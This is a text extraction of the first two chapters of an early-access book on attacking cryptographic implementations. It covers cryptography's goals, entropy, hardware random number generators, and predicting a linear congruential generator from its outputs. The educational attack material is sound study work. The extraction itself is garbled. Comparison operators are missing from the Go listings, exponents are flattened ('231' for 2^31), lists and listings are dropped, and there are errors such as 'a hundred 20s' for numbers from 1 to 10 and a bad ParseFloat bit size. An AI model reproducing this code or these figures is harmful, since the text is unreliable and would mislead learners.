Khan K. Hacking Cryptography. Write, Break, and Fix Real-World... (MEAP v4) 2023
Khan K. Hacking Cryptography. Write, Break, and Fix Real-World... (MEAP v4) 2023
Khan K. Hacking Cryptography. Write, Break, and Fix Real-World... (MEAP v4) 2023
Cryptography has recently been thrust into the limelight thanks to crypto currencies, but it
has been around for far longer than that. It protects everything we do in the digital world and
is the last and most reliable line of defense for our data. Despite its significance and success,
cryptography is anything but infallible. While the theoretical foundations of this field of
knowledge are pretty sturdy, the practical applications seem almost doomed to eventually run
afoul of one implementation mistake or another.
A good understanding of how physical locks work can be obtained by learning how to pick
locks. That’s essentially what this book is about. While there are many books that explain how
cryptography is implemented (akin to how locks are made), this book builds an understanding
of cryptography by looking at how cryptographic locks are usually picked.
We hope that this book will expand the general understanding & discourse surrounding
cryptographic engineering. We look forward to hearing your thoughts on things that can be
improved. The MEAP is somewhat of a unique thing in the publishing industry and your feedback
is exactly the proverbial gold that it is trying to mine. It is an exciting prospect to be able to
improve your book based on actual reader feedback while you’re still writing it, and we heartily
appreciate the opportunity for doing so.
Please be sure to post any questions, comments, or suggestions you have about the book in
the liveBook discussion forum.
Thank you,
—Kamran Khan & Bill Cox
brief contents
1 Introduction
2 Random number generators
3 Implementing and exploiting RNGs
4 Stream ciphers
5 Block ciphers
6 Hash functions
7 Public key cryptography
8 Digital signatures
9 Common pitfalls for crypto implementations
This chapter covers
What is cryptography and why is it important?
Where and how is cryptography used?
How is this book going to cover cryptography?
1
Introduction
Getting cryptography right is paramount for ensuring digital security in the modern world.
The mathematical ideas and theory behind cryptography are quite hard to break, while the
implementations (transforming mathematical ideas to reality via engineering processes, e.g.,
programming code and designing hardware) have orders of magnitude more vulnerabil-
ities that are much easier to exploit. For these reasons, malicious actors regularly target
flaws in implementations in order to “break” crypto. We wanted to capture these attacks
with an organized approach so that engineers working in information security can use this
book to build an elementary intuition for how cryptographic engineering usually falls prey
to adversaries.
In the upcoming chapters, we will dive into the technical details of how cryptography is
implemented and exploited, but before that let’s first go through a high-level view of what
cryptography is.
1.1 What is cryptography?
Cryptography is primarily the art of securing data by transforming or encoding it in a way
that makes it incomprehensible for everyone except the intended recipients.
Imagine an impenetrable safe that can only be opened with a unique key. You leave the
key with a relative and then travel across the country taking the safe box with you.
Now, when you need to send something secretly to this relative you put the items in the
safe and ship them using regular mail. The post office can see who the box is addressed
to (because they need to deliver it) but they (or anyone else, e.g., mailbox thieves) cannot
open the box to see the contents. Only the relative who has the specific key can retrieve
the contents once they receive the box.
Cryptography can be thought of as the digital equivalent of the safe box in the preceding
example. One of its primary uses is to protect the secrecy of digital messages while they
are transported around the world (by various internet service providers) in the form of
internet packets.
Protecting messages against eavesdroppers has historically been the main area of focus
for practitioners of cryptography. In the last half-century, however, cryptographic tools
are also used to ensure integrity & authenticity of data. Going back to the example of the
shipping boxes this would be akin to providing some incontrovertible proof that nobody
tampered with the box while it was en route.
Cryptography is the cornerstone of computer and network security in today’s world
and is by far the best tool for the job if you want to protect data against (both malicious
and accidental) exposure and/or corruption.
Data itself has grown exponentially in importance as governments, businesses and con-
sumers imbue it with meaning and significance; to the point where it is often referred to
as the “gold of the 21st century”. At its core, the main ingredients that drive the digital
revolution are:
Whether we are watching video streams, doing online banking, or working from home
via video calls or playing video games; data drives our digital lives – and by extension, our
physical ones as well.
The infrastructure that deals with these truly gargantuan amounts of data is almost
always shared. For example, when we open a bank account we do not get a banking kiosk
installed in our homes with a dedicated physical wire to the bank’s mainframes. We instead
use the internet to access the bank’s servers and our digital traffic shares the physical path
with many other businesses and customers along the way.
Sharing the infrastructure, however, implies that the data is exposed to parties other
than the ones it was intended for. Not only could others look at this data, but they can
also actively modify or corrupt it for nefarious gains. Cryptography guards data against
these scenarios; e.g., ensuring that our Internet service providers cannot see our emails
or someone who has access to our Wi-Fi (possibly in a public place) cannot modify our
transactions when we are making online payments.
Other areas such as military applications rely even more heavily on the secrecy and in-
tegrity of data. Breaking the encryption used by the Enigma machine proved to be a piv-
otal advantage for allies in World War II. It would not be an overstatement to say that
while secrecy and confidentiality of messages have always been important, providing these
properties at scale has become a crucial aspect of modern society. Those who could do it
well gained distinct competitive advantages and those who lagged (whether it was nations
or corporations) paid the price dearly with the loss of consumer confidence, revenues, po-
litical influence; and even strategic setbacks in full-scale wars.
Cryptography is used to accomplish the following goals:
Confidentiality: Protect data so that only the intended parties can see it. For example,
the data on your laptop’s hard drive should remain inaccessible to an attacker who
steals it.
Integrity: Protect data so that it is not modified or corrupted while it is being shared
between legitimate parties.
Authenticity: Ensure that an entity is who they claim to be. For example, if you are
communicating with an old schoolmate over a messaging app we want to make sure
that it is indeed them at the other end and not some malicious code or employee
masquerading as your friend.
It is important to note that the data should remain protected even if an attacker knows
every detail about the encryption algorithm except for the secret key itself. This is known
as “Kerckhoff’s principle”. A system violates this principle when its security hinges upon
whether or not its implementation details (e.g., the algorithm, the source code, and design
documents) are known to adversaries. Unfortunately, this principle is overlooked far too
often in real-world engineering decisions; mostly as a result of time constraints (publicly
auditing implementations and leveraging trained eyeballs takes time and resources) and
sometimes as an artifact of human psychology (it’s no fun to have your work attacked if
it’s important to do so).
Kerckhoff’s principle
A cryptosystem should be secure even if an attacker knows everything about the sys-
tem except for the key.
1.2.2 Integrity
While confidentiality protects data against being seen, integrity protects data against being
modified or corrupted. Figure 1.2 shows the usage of a key to “sign” the data, essentially
generating a strong pairing between the data and the signature. The data can then be sent
to a trusted party – who also has the secret key – along with the signature without any
fear of it being modified along the way (e.g., by an Internet Service Provider). Since any
attacker attempting to corrupt the data would not have the secret key they would not be
able to generate a valid signature. Once the data reaches its intended destination the trusted
party can use its copy of the secret key to verify the signature. Therefore, while data is
transmitted in plain sight, it is guarded against modification by ensuring integrity.
1.2.3 Authenticity
Authenticity is a special case of integrity. Integrity helps prove that a particular piece of
data was not modified. Authenticity builds upon that assertion to conclude that such data
was in control of a particular entity at some point. For example, imagine a website that does
not want its users to provide a username and password each time they visit. To improve
Figure 1.2 Usage of “symmetric” signing for ensuring integrity
the user experience the website generates a “token” upon successful login (i.e., a piece
of data signifying that the user provided the correct username and password) and signs
it with a secret key. The signed token is then downloaded on the user machine and for
subsequent visits, it is automatically provided to the website, which uses its secret key to
verify the integrity of the token. If the token signature is valid, the website can assume that
it issued the token itself at some prior point and building on that assumption it can trust
the username specified in the token. In other words, the website has authenticated the user
by their possession of a cryptographic token.
We can find some very rough analogies for applications of confidentiality, integrity and
authenticity around us. If a super-unforgeable stamp is made that can be verified by a
recipient, it could be used to stamp an envelope’s seal. The envelope is providing con-
fidentiality against eavesdroppers. The stamp is providing integrity so that the recipient
can verify the stamp to trust the contents of the envelope. Let’s say that the envelope
contained a local newspaper from some remote town. You could then naturally conclude
that whoever possessed the stamp was in that particular town on a particular day. The last
conclusion admittedly requires a leap of faith (e.g., maybe the stamp was lost or stolen,
maybe the newspaper was mailed and then stamped in a different town) but you can still
base a reasonable assumption of authenticity based on the integrity of the envelope. Simi-
larly, the formula for Coca-Cola is confidential. The caps on the bottles help us consumers
verify the integrity of the container and based on the results of our integrity check (and
the time/location of our purchase) we decide that the contents of the bottle are indeed
what they say on the label, i.e., they are authenticated by the Coca-Cola company and the
appropriate regulatory food authorities.
None of this will preempt the need for getting your code reviewed by as many experts
as possible. You cannot point to any cryptographic implementation and claim that it is
secure. The best you can do is to have as many people try to break it as possible and then
fix the bugs as fast as possible to build confidence in the codebase. Linus Torvalds (the
creator of the Linux operating system) once famously quipped, "given enough eyeballs, all
bugs are shallow". For cryptographic code that is both a curse and a blessing. When bugs are
found in cryptographic code they produce vulnerabilities. On the other hand, when you
have enough eyeballs you approach the tail-end of remaining bugs as they become harder
to find and the code in question becomes reasonably safe. This book aims to assist in the
training of those eyeballs.
1.5 Summary
Cryptography is the art of protecting the confidentiality and integrity of data. It con-
sists of mathematical theory and software (code) or hardware (dedicated chips) im-
plementations that leverage those mathematical ideas.
Cryptographic algorithms (i.e., the mathematical theory) are developed and adapted
after careful consideration and debate by top experts in the field.
Most cryptographic code is broken via attacks on its engineering implementation as
opposed to weaknesses in its mathematical theory.
Data is all around us, and permeates through shared infrastructure where it is paramount
to ensure its secrecy and safety.
When leveraging cryptography for security a good engineering approach is to use
well-established implementations.
Complex interactions between (even well-established) cryptographic components
can end up causing subtle weaknesses.
Readers of academic material on cryptography are well-advised against writing their
own cryptography because of the risk of subtle bugs that can compromise the security
of the whole system.
For cryptographic code that does have good reasons for being written from scratch, it
is valuable to crowdsource the review process and get the code reviewed by as many
experts as possible.
Random number generators
In this chapter, we lay the foundations for understanding what random numbers are and
what are some different kinds of random number generators. We shall implement and
exploit an insecure but quite widely used type of RNG known as linear-congruential gen-
erators (LCG). LCGs are not meant to be used for security-sensitive applications but will
help us get into the habit of implementing and exploiting algorithms. (In the next we shall
implement and exploit a cryptographically secure RNG.)
My first encounter with randomness was when I used the RAND button on my father’s
scientific calculator. Whenever I would press it I would get a seemingly different number.
This confused me endlessly. As a kid, you have some intuition about the limits of the
world around you. For example, you know that while folks inside the TV represent real
people, you cannot physically go inside the box. I understood that human beings have
created machines that could do 2+2 for us and give us answers. But the machine was under
our control. How could human beings ask a machine to decide something apparently all
on its own? Did that mean that the machines were thinking for themselves? I was too
young to comprehend the differences between determinism and randomness but as I grew
up learning about random number generators helped me wrap my head around how the
calculator was working. 1
Let’s begin by taking a deeper look at what random means. Imagine a magician asking
you, “Think of a random number between 1 and 10”. Most of us understand at an intuitive
level what that means. The magician is asking us to think of a number that they supposedly
cannot guess or predict.
Essentially the magician is asking you to generate a random number. We could therefore
visualize random number generators as something that produces an arbitrary sequence of
random numbers.
Figure 2.1 RNGs generate random numbers that are hard to predict
You would think that we would be pretty good at such a rudimentary task but as it
turns out human beings are lousy RNGs. Ideally, if you ask an RNG to generate one thou-
sand numbers between 1 and 10 you would get roughly a hundred 10s, a hundred 20s,
a hundred 30s and so on. In other words, the distribution of generated numbers would
be uniform. On the other hand, if you ask one thousand people to think of a number be-
tween 1 and 10 (or the same person a thousand times, although it is advised against for
reasons unrelated to random numbers or cryptography) you are likely to get many more
3s and 7s than 1s and 10s. This might seem inconsequential but the same problem plays
out at a larger scale where many people end up picking the same password under similar
constraints.
Instead of 100 million possible passwords, the number has now been reduced to 55800.
In fact, we would on average need to make only around 28 thousand guesses before finding
the right password – a number much smaller than 50 million! The passwords are still 8-
digits in length like before, e.g., November 24, 1988 would be represented as the eight-
digit number 11241988; but the range of possible passwords has been reduced drastically
making the job of an attacker way easier than before.
When a cryptographic key is picked, any bias in the RNG where it strays from uniform
distribution could make the job of guessing keys easier for the attackers. There are many
other uses for random numbers in the area of cryptography. For example, your passwords
are mixed with random numbers before some computations are performed on them to
make them secure. (We will discuss the exact nature of those computations in our chap-
ter on hashing.) In cryptographically-verifiable elections, votes are mixed with random
numbers to ensure that votes to the same candidate do not end up producing the same
encrypted data.
We, therefore, conclude that for cryptographic needs, an RNG such as the one shown
in figure 2.1 should produce output (the lone arrow in the picture) that is uniformly dis-
tributed across the entire range of possible outputs.
2.1.2 Entropy: Quantifying unpredictability
Another important characteristic of the RNGs is entropy, which can be defined as the mea-
sure of uncertainty (or disorder – in terms of its classical definition) in a system. In a fair
coin toss where both sides have equal chances of landing up the entropy is 1 bit. If we
denote heads by 1 and tails by 0, we are equally unsure about whether the value of that
single bit will be heads or tails. If we were to predict the outcome of 10 successive fair coin
tosses we would have an entropy of 10 bits.
If the coin had been tampered with in some way the entropy would be less than 1 bit.
In fact the more biased it is the lesser the entropy would be. An extreme example would
be that if you have tails on both sides of the coin the entropy would be 0 bits. If the coin
has been tampered with so that heads has a 75% probability of coming up and tails only
25%, the entropy of such a coin toss would only be roughly 0.8 bits. Let’s see how.
The entropy of a probability distribution (e.g., distribution of numbers generated by an
RNG) can be calculated as shown in the equation 2.2.
∑
H (X) = − px log2 px
x∈X (2.2)
= −p1 × log2 (p1 ) − p2 × log2 (p2 ) − ...pn × log2 (pn )
p1 is the probability of the first choice being picked up, p2 is the probability of the second
choice being picked up and so on. Each probability is multiplied by its binary log (log to the
base 2) before their negative sums are added up. In terms of a coin toss, we only have pheads
and ptails . The sum of all probabilities for a given probability space is 1. In other words,
while there’s a 50% (0.5) chance of either side coming up each time you flip the coin there
is a 100% chance that the answer will be one of those two options. Each probability value is
always less than 1 which makes its logarithm negative, so that we calculate a negative sum
to produce a positive value for the entropy.
We can write a program to calculate the entropy of a biased coin toss. It will help us get
in the flow for upcoming code examples as well. In listing 2.1 we are going to:
Take two floating point numbers as input, respectively representing the probability
of heads or tails coming out on top.
When parsing the input, we want the sum of the two numbers to be equal to 1 (and
also not to exceed it). Because of the way floating point numbers work in Go, if we
simply compare (heads+tails) to 1 for equality it would trip for some inputs, e.g.,
0.9 and 0.1 (even though their sum should be equal to 1). For this reason on line 34
we measure how close we are to approaching 1 instead of testing for equality.
Apply the formula in equation 2.2 to these values and output the result.
These steps are shown in the flowchart in figure 2.2.
Figure 2.2 Flow chart for calculating the entropy of a biased coin toss
Listing 2.1 ch02/biased_coin_toss/main.go
1 package main
2
3 import (
4 ”fmt”
5 ”math”
6 ”os”
7 ”strconv”
8 )
9
10 func main() {
11 var line string
12
13 fmt.Printf(”Enter probability of heads (between 0.0 and 1.0): ”)
14 fmt.Scanln(&line)
15 heads, err := strconv.ParseFloat(line, 32)
16 if err != nil || heads 0 || heads 1 {
17 fmt.Println(”Invalid probability value for heads”)
18 os.Exit(1)
19 }
20
21 fmt.Printf(”Enter probability of tails (between 0.0 and 1.0): ”)
22 fmt.Scanln(&line)
23 tails, err := strconv.ParseFloat(line, 2)
24 if err != nil || tails 0 || tails 1 {
25 fmt.Println(”Invalid probability value for heads”)
26 os.Exit(1)
27 }
28
29 if heads+tails > 1 {
30 fmt.Println(”Sum of P(heads) and P(tails) must be less than 1”)
31 os.Exit(1)
32 }
33
This measures the delta (how far the value is)
34 if 1-(heads+tails) > 0.01 { of (heads+tails) from 1
35 fmt.Println(”Sum of P(heads) and P(tails) must be 1”)
36 os.Exit(1)
37 }
38
39 entropy := -(heads * math.Log2(heads)) - (tails * math.Log2(tails))
40 fmt.Printf(”P(heads)=%.2f, P(tails)=%.2f, Entropy: %.2f bits\n”, heads,
tails, entropy)
41 }
Let’s run this program for a few inputs as shown in listing 2.2.
As you can see, even though we are still getting one bit of output (i.e., whether the result
was heads or tails) when we do toss the coin, the entropy of output decreases as the coin
toss becomes more biased. Another way to understand this is to look at it from the other
side, i.e., if a coin toss has an entropy of 1 bit, guessing its output becomes as hard as it can
be for a coin toss. If it has an entropy of 0.47 bits we know one outcome is likelier than
the other so guessing it becomes relatively easier.
Figure 2.3 shows how entropy (the solid curved line) changes as the coin toss becomes
more biased. The dotted lines represent the probabilities of heads or tails coming up.
Please note that their sum always remains exactly equal to 1 because they represent the
entire probability space, i.e., there is no third outcome. Entropy is maximum (the peak in
the middle) when both heads and tails have a 50% probability of occurring. That is when
it is the hardest to predict which way the coin is likelier to land.
So how is entropy related to RNGs? If the output of an RNG is uniformly distributed,
the job of guessing the output is as hard as it could be. We have maximum possible uncer-
tainty about the output and entropy is the measure of uncertainty.
TRNGs sample physical world to generate values that are practically unpredictable.
(There could be a philosophical argument that we are living in a deterministic universe
and nothing is truly “unpredictable”, but it is not relevant for cryptographic discussions.
We only need the values to be un-guessable by contemporary adversaries on earth.) This
is shown in figure 2.4. Some of these phenomena include:
Figure 2.5 Diodes help ensure the flow of current in a single direction.
When the voltage is applied to the diode such that the current can flow in its natural di-
rection it is called to be “forward-biased”. When the voltage is reversed the diode (ideally)
stops conducting and is said to be “reverse-biased”.
The fact that the current does not usually flow when a diode is reverse-biased is exactly
what makes them useful. There are however a few unintended properties associated with
certain types of diodes. These are called “parasitic” effects as they are, generally-speaking,
undesirable. Sometimes though even the parasitic effects can be useful, as is the case of
random-number generation and Avalanche or Zener effects, which are two distinct physi-
cal phenomena that generate noise in the electrical circuit. This noise can then be sampled
by amplifying it and running it through an analog-to-digital (ADC) converter.
Zener diodes make poor TRNGs despite their heavy usage for that purpose. There are
a few reasons why:
Zener diodes are carefully designed to reduce avalanche noise and make terrible
sources of electronic noise. Note that a very common use case for Zener diodes is
power supply regulation where noise is highly undesirable.
The parasitic Zener effect of a reverse-biased diode is not typically parameterized by
the manufacturer. The manufacturers prioritize quality control for the "proper" oper-
ation of Zener diodes as opposed to side effects when biased in the reverse direction.
The noise varies from device to device dramatically. Even worse, from manufacturer
to manufacturer variations can easily be > 10X in noise, and several volts’ difference
in breakdown voltage.
The noise from these Zener effects is fairly temperature sensitive and can change
over time as the circuit ages.
There is no physical model we can correlate well to Zener noise for assessing the
health of a TRNG.
Typical ring oscillators have 5 or more inverters, but the number is always odd. Usually,
this oscillation is subject to thermal drift. That is, their operation (e.g., how long it takes
for the output level to fully change when input is inverted) varies in response to ambient
temperature. The underlying phenomenon providing unpredictability is the phase noise
in the electrical signal.
The ring oscillator TRNG designs have a few shortcomings and are responsible for
quite a few failures in cryptography. Here’s why:
As we saw in the guidelines at the beginning of the section, a physical model based
on the underlying phenomena that lets us calculate entropy is important for an RNG.
There is no physical model we can use to predict the operation of ring oscillator-based
RNGs (which is further complicated by the presence of thermal and other kinds of
unpredictable drifts in oscillators).
Fabrication processes generally improve their processes over time, reducing even
thermal drift, and circuits that were designed well can end up generating highly pre-
dictable output with newer and improved manufacturing processes. This is similar to
Zener diodes where RNG is relying on a parasitic effect which is not the priority for
the manufacturing process (and is in many cases undesirable, to begin with).
Ring oscillators have a poor physical defense. Anyone with a sine wave generator
can introduce sine-shaped noise (close to the ring oscillator frequency) on the power
source of the chip and the oscillator will lock onto that frequency, making the output
of the TRNG trivial for the attacker to guess. This is an example of “fault-injection”
attacks where the attacker tries to influence the output of a TRNG.
If you do decide to use ring oscillator-based TRNGs here are some best practices to
follow:
Add a simple binary counter to the output of the TRNG, so you know how many
times the ring oscillator toggled from a 0 to a 1. If, e.g., in the last minute (or some
other window) the number of ones drastically outweigh the number of zeros, the
discrepancy could indicate faulty operation.
Make the design public and expose raw access to the TRNG’s full counter output bits
so its health can be assessed.
If you use a fixed delay to sample the TRNG (the simplest solution used virtually
everywhere), then have an external health checker estimate the unpredictability (by
calculating the entropy using the equation 2.2) per sample from the TRNG.
Remember that ring oscillator TRNGs are subject to simple noise injection attacks.
If that’s okay for your threat model then you’re good. On the other hand, if you need
some physical protection, consider potting 3 over your IC, or putting some other
physical barrier to keep the attacker at least a few millimeters away, and preferably a
few inches.
If you have access to a secure flash on-chip, which cannot easily be read by an at-
tacker, consider seeding your CSPRNG from both the TRNG and a seed stored in
flash, and then update the seed in flash from the CSPRNG. This way, if your TRNG
degrades due to process drift, temperature, etc, you can integrate the TRNG output
over multiple boot cycles, and hopefully reach a computationally un-guessable state.
While the last recommendation applies in general to other TRNGs as well ring oscillators-
based TRNGs should pay special attention to it owing to their poor defenses against fault-
injection attacks.
TRNGS BASED ON THE MODULAR ENTROPY MULTIPLICATION
The MEM architecture for RNGs takes thermal noise generated by a resistor and dou-
bles it repeatedly. This causes the voltage to grow exponentially. After it crosses a threshold
(which is the halfway point for the voltage range) instead of doubling the voltage itself it
doubles the excess from halfway point and adds the result to the original voltage. Since
the operations are performed in a modular fashion (meaning the result never overflows,
much like a clock where adding four hours to 9 results in 1 instead of overflowing to 13)
the excess-doubling step ends up having a net subtractive outcome (i.e., going from the
larger number of 9 to the smaller number of 1 in the example presented above).
3 Potting (electronics). https://en.wikipedia.org/wiki/Potting_(electronics)
Based on these two simple rules the voltage keeps fluctuating quite unpredictably but
stays within its range. The MEM method has many distinct advantages for a TRNG:
It is resistant to electromagnetic noise injection or capacitive/inductive coupling at-
tacks.
It provides a physical model that can be used to continuously assess the health of the
RNG.
The components involved are very cheap and few in number and the design is unen-
cumbered by patents.
Several free schematics are available (e.g., Bill Cox’s infnoise 4 design or Peter’s re-
design known as REDOUBLER 5 ).
It is also very fast, with infnoise being able to run in excess of 100 Mbit/second. It
is important to understand though that speed itself should not be a critical factor for
TRNGs as their output should be used only to seed cryptographically secure pseudo-
random number generators that we will soon discuss in this chapter. In general 512
random bits from a TRNG should be enough to seed CSPRNGs as long as the lat-
ter upholds its own security guarantees (in chapter 3 we will dive deeper into how
CSPRNGs are compromised).
Randomness extractors
Randomness extractors clean noise generated from weakly random entropy sources
to produce high-quality random output.
6 Thompson, P. (2018). John Von Neumann, the Last Great Polymath. Sothebys. https://www.sothebys.
com/en/articles/john-von-neumann-the-last-great-polymath
Figure 2.7 TRNGs are used to seed PRNGs
1 #include <iostream>
2 #include <random>
3
4 int main() {
5 std::minstd_rand lcg_rand;
6
7 lcg_rand.seed(42);
8
9 for (int i = 0; i < 10; ++i) {
10 std::cout << lcg_rand() << ”, ”;
11 }
12 std::cout << lcg_rand() << std::endl;
13 }
We are using the default minstd_rand generator that comes with the C++ compilers.
If you compile and run this file with the GNU C++ compiler, you will get a sequence of
numbers looking like this:
$ g++ main.cpp
$ ./a.out
2027382, 1226992407, 551494037, 961371815, 1404753842, 2076553157,
1350734175, 1538354858, 90320905, 488601845, 1634248641
Next, we are going to implement this generator in Go ourselves using equation 2.3. The
LCG used by the C++ counterpart uses constant values given in equation 2.4.
m = 231 − 1
a = 48271 (2.4)
c=0
By plugging these constants in the LCG equation, and seeding with the same input (42),
we should get the same sequence of numbers back. Let’s write a program to do so.
Starting with the next example we will be splitting a single code file among multiple
listings in the book to make it easier to follow along. The full code for these examples can
be found in the book repository at https://github.com/krkhan/crypto-impl-
exploit. The book listings will only be focusing on specific portions that are important
or new to the discussion taking place. Please note that listing 2.4 starts at line 3.
The fields multiplier, increment and modulus have been covered above as parts of
equation 2.3. Similarly, currentValue corresponds to Xn . The next value Xn+1 is there-
fore generated via the following function, which returns the old value and moves the RNG
one step forward. We continue listing the ch02/lcg/main.go file in listing 2.5, starting
from line 21 now.
To test this LCG we will initialize it with the constants used in the C++ minstd_rand
generator – including the seed value of 42 (the same one we used in listing 2.3). Please
note that listing 2.6 refers to a different file name from the accompanying code repo.
Our LCG produced the same output as the C++ one. The output sequence looks random
but as we’ll see in the next section, even if an attacker knows nothing about the internal
parameters of this LCG they can easily predict future outputs just by observing it in action
for a while. For the time being, we can see that a PRNG:
Has an algorithm that it uses to keep generating values.
Starts with a seed as input for the first run of that algorithm.
Has an internal state which keeps mutating according to the algorithm. In our LCG
example, the state was Xn , stored in lcg.currentValue.
This is shown in figure 2.8.
At some point, every PRNG starts repeating values. The number of steps it takes for a
PRNG to start repeating values is known as its period. For the LCG we implemented the
period is 231 − 1, meaning it will start repeating its output after generating 2147483647
values.
Figure 2.8 PRNGs have a state and are initialized with a seed. The PRNG algorithm keeps mutating the
state.
We can start with a simple scenario by assuming that we (as attackers) have the multi-
plier a and the modulus m but not the increment c. We can simply observe two values X0
and X1 and find out the modulus by rearranging equation them as shown in equation 2.6.
X1 = (aX0 + c) mod m
(2.6)
c = (X1 − aX0 ) mod m
Let’s say we know the modulus but neither the increment nor the multiplier. Can we
recover the multiplier? This time we observe three values X0 , X1 and X2 . We can find out
the multiplier using these values as shown in equation 2.7.
X1 = (aX0 + c) mod m
X2 = (aX1 + c) mod m
X2 − X1 = (aX1 − aX0 ) mod m
(2.7)
X2 − X1 = (a(X1 − X0 )) mod m
( )
(X2 − X1 )
a= mod m
(X1 − X0 )
There is a problem though, we need to find the inverse of a value (X1 − X0 ). Finding
the multiplicative inverse of something is easy for rational numbers. For example, the
multiplicative inverse of 5 is 15 ; for 73 it is 73 and so on. For modulus arithmetic, it’s a little
tricky. We are all familiar with the modular arithmetic of 12-hour clocks where 10 plus
3 hours is 1 (modulus 12). What is the multiplicative inverse of, let’s say, 7 mod 12? We
need to find some n to multiply 7 with that would result in 1. There is no 71 to pick
among integers modulo 12.
As it turns out, the multiplicative inverse for 7 modulo 12 is 7 itself! 7 into 7 is equal to
49, which is only 1 more than a multiple of 12. As you can see, the multiplicative inverse
is not straightforward in modular arithmetic. Finding modular multiplicative inverse has
many interesting solutions, but we are going to use the one provided by the Go standard
library itself. Unfortunately, the code for doing so will seem a little clunky right now, as
shown in listing 2.8. In the next chapter, we shall explore the “big numbers” library from
Go in further detail.
3 import (
4 ”github.com/krkhan/crypto-impl-exploit/ch02/lcg/go/impl_lcg”
5 ”math/big”
6 )
7
8 func findModInverse(a, m int64) int64 {
9 return new(big.Int).ModInverse(big.NewInt(a), big.NewInt(m)).Int64()
10 }
Now that we have a function to calculate modular multiplicative inverse with, we can
implement equation 2.7 in listing 2.9.
Finding the modulus is the hardest part. Let’s say we are trying to find the upper limit of
the hours’ arm on a clock. In other words, we see numbers like 3, 5, 1, 11, 7, 8 etc. and we
are trying to find out how high they go when people talk about them. Sure, you know it’s 12
for the scenario of a clock but let’s say you were an alien who didn’t know that beforehand.
Somehow you were able to drop in on human conversations about daily plans. You could
probably infer that (for the long arm on the clock) 11 is the highest number people talk
about. However, in a particularly non-happening place, you might end up assuming that
people’s plans go at the most up to only 8 PM so the whole circle represents only nine
hours in total. On the other hand, if you had an automatic counter scanning all the eggs
coming into a supermarket once you see the totals of 204, 120, 132, 84, 240 and 348
you might reasonably conclude that the eggs are coming in crates of dozens because the
greatest common divisor (GCD) for all those numbers is 12. In other words, all of these
multiples of a dozen are equal to zero modulus 12.
To find the modulus of our LCG we need to find values that are congruent to zero
modulus m. Let’s generate a bunch of values this time as shown in equation 2.8.
X1 = (aX0 + c) mod m
X2 = (aX1 + c) mod m (2.8)
X3 = (aX2 + c) mod m
If we take the differences between each pair of consecutive values we get the equation
2.9.
Δ0 = (X1 − X0 ) mod m
Δ1 = (X2 − X1 ) mod m (2.9)
Δ2 = (X3 − X2 ) mod m
We can substitute values of X2 and X1 with their definitions from 2.8, resulting in
equation 2.10. Please note that the increment c is canceled out during the substitution.
Therefore, each ΔN is a multiple of ΔN −1 .
Δ1 = (X2 − X1 ) mod m
Δ1 = (aX1 − aX0 ) mod m
Δ1 = (a(X1 − X0 )) mod m
(2.10)
Δ1 = (aΔ0 ) mod m
Δ1 Δ0 mod m
Δ2 Δ1 mod m
Equation 2.10 can be used to find large numbers equal to zero modulus m. Let’s call
these “zeros”, they can be found by rearranging equation 2.10 into equation 2.11.
Zero = Δ2 Δ0 − Δ1 Δ1
Zero = a 2 X02 − a 2 X02 (2.11)
Zero 0 mod m
We can collect such “zero” values (which are non-zero integers but are congruent to
zero modulus m because they are multiples of m, similar to how 24, 36, 72 and 48 are
multiples of 12) and then calculate their GCD to find the modulus. To calculate the GCD
we will use the Go big library again as shown in listing 2.10.
Listing 2.13 tests our CloneLCG() function by creating an LCG and seeding it with the
current UNIX time in seconds. We then clone the LCG and generate 100 values to ensure
that the cloned RNG and original RNG are generating the same values, or in other words,
the cloned RNG is predicting the original RNG correctly.
You can run these tests using make exploit_lcg in the code repo:
$ make exploit_lcg
go clean -testcache
go test -v ./ch02/lcg/go/exploit_lcg
=== RUN TestCloneLCG
exploit_lcg_test.go:26: observed: 52e4acba, cloned: 52e4acba
exploit_lcg_test.go:26: observed: 72008d98, cloned: 72008d98
exploit_lcg_test.go:26: observed: 797724ca, cloned: 797724ca
exploit_lcg_test.go:26: observed: 2f7f18a9, cloned: 2f7f18a9
exploit_lcg_test.go:26: observed: 4672328b, cloned: 4672328b
--- PASS: TestCloneLCG (0.00s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch02/lcg/go/exploit_lcg 0.031
s
thwarts backward secrecy because the attacker can simply replicate the state by looking at
the output and then use the publicly-known algorithm to generate new values.
We address this by adding another dotted arrow between the state and the output as
shown in figure 2.10.
Figure 2.10 Some PRNGs transform the state before outputting it as the next value.
The dotted arrows represent transformations that are hard to reverse. This means that if
someone knows the output on the right, it should be hard for them to calculate the state
and by extension, the previous values (coming into the box from the left). The next block
would therefore look like figure 2.11.
We can now visualize our PRNGs as a “state-machine” as shown in figure 2.12.
There are three functions in figure 2.12:
Init(Seed) transforms the seed to generate State0 .
Input-based attacks: Every PRNG needs to be seeded. If an attacker can guess the
seed they can recover the entire output by simply running the PRNG on that seed.
For example, it used to be common practice in applications to seed using the system
time. Similar to the birthday password-guessing we saw earlier in this chapter, the
attacker can simply guess all the seconds in the last month to find the right seed. For
our LCG examples, we used a fixed seed of 42 precisely because we want to generate
a fixed output that we would then be able to compare to a reference implementation.
To protect against these attacks TRNGs are used to seed the input of PRNGs. Re-
member, TRNGs produce random numbers based on physical phenomena but are
not very performant. PRNGs provide good performance but rely on a seed value
which can lead to input-based attacks. The solution is to combine them as shown in
figure 2.7.
State Compromise Extension Attacks: If an attacker can compute the internal state
of a PRNG (essentially somehow reverse the Next() function in figure 2.12 they can
compute all the future values that will be generated by this PRNG. We will cover this
in much more detail in the next chapter where we will implement two such attacks.
2.3 Summary
Random numbers are used extensively in cryptographic applications.
Random number generators are characterized by their output distribution and en-
tropy.
The entropy of an RNG is maximized when its output distribution is uniform.
Hardware random number generators (HRNGs) – also known as true random num-
ber generators (TRNGs) – sample physical phenomena to generate a slow but unpre-
dictable stream of output.
TRNGs need to be carefully designed and tested to ensure good quality randomness.
Since they are used as input to CSPRNGs which eventually generate all the random-
ness needed for cryptography, good security begins at the TRNG.
TRNGs can be based on a variety of physical phenomena ranging from nuclear decay
to noise in electrical circuits.
Avalanche and Zener diodes are widely used in TRNG constructions but are sus-
ceptible to attacks and do not provide a good way to assess the health of the RNG
process.
Modular entropy multiplication is a relatively newer method for constructing TRNGs
which also provides a physical model to assist in continuous monitoring of the RNG’s
health.
Pseudo-random number generators (PRNGs) take seed values as input and generate
a fast but deterministic stream output.
Cryptographically secure random number generators (CSPRNGs) are PRNGs that
satisfy some additional properties, most importantly backward and forward security.
Always use CSPRNGs for cryptographic applications and avoid weak PRNGs that
are used by default in many programming languages.
